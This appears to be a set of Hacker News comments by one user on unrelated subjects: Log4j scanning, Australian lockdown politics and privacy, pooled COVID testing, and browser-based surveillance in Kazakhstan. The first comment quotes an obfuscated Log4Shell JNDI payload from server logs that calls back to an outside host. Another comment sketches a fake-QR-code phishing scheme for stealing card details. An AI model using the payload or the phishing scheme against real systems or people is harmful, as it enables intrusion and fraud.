As I understood, your policy blocks LDAP port (389). All of the scanning I see in logs at the moment use port 80:
"${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
Please put some effort in getting information instead of creating straw man. NSW and Victoria are in a lockdown to have time to get 70-80% of eligible population double-vaccinated. Modelling by couple of institutes show that if lockdown ends today, hospitals would be overwhelmed and lots of preventable deaths occur.
By all estimates we would reach that 70-80% number in 1-3 months time, so that's the plan. Google for "Doherty Institute planning", visit https://covidlive.com.au, check daily press conference of VIC and NSW premiers - answers to your questions are in plain sight.
Hackernews taking 6-month old Murdoch news story as a credible source? Yes, whatever tickles your alarmist fancy.
Living in Australia for many years, I can't stand reading all those "Privacy in Australia is dead, and look at their lockdowns!" articles here.
I can download whatever torrent I want without getting warning from ISP or some antipiracy body.
I can post "my prime minister is a cunt" wherever I want and be alright.
I don't have mobile ISP injecting ads in my "https" traffic.
I'm not forced to install SSL certificates issued by some government body.
None of E2EE messengers are banned.
Media that have critical view on government do not get their licenses revoked.
All the breaches of privacy from the state and all government fuckups are all over the news and not silenced.
Not many countries that were my home in the past can boast about all of this. What we have here is one of the best tradeoffs you can get in modern democracy.
I was always wondering, how secure are QR code menus?
What if someone will quietly put identically looking QR code that would point not to https://coolcafe.xyz/menu/table/5, but to https://thecoolcafe.xyz/menu/table/5, that is a full copy of the legit site, just with payment form logging CC details and then throwing some vague error and then redirecting to legit site (or even more elaborate scam with proxying all requests to legit site and logging all data)?
Should be pretty low-effort and low-risk operation to collect CC details. Clients do not know which site they expect to land on when they scan that QR code.
I'm wondering, if the bottleneck in testing is number of tests per day available, could we use Bloom filter methodology for it?
Like, for example, take samples of 1024 people, assign them 10-bit IDs randomly, mix samples of everyone with bit 1 in position 0 in one pool, with bit 1 in position 1 in 2nd pool and so on. Then do 10 tests, and whoever has negative result in any of set bits of his ID, does not have virus. If too many people of 1024 have virus, add another set of random IDs and do 10 more tests, etc.
If there are no technical limitations, that would allow to get negative results to, let's say, 900 people from 1024 with only 10-30 tests. Other 124 could be tested personally. That's 85% reduction in number of tests needed.
This is the basis for several sequencing-based test protocols in development. It's called barcoding, and the massively parallel sequencing of tens of thousands of barcoded pooled sequences is called bar-seq.
They don't even need to fork Firefox - there are couple of Russian browsers (https://browser.yandex.com/, https://browser.ru/) that would definitely allow Kazakhstan government to snoop into traffic (and hey even have Kazakh language support already). ISP will just advise clients that bad western companies banned Kazakhstan, so please use good safe Russian browsers.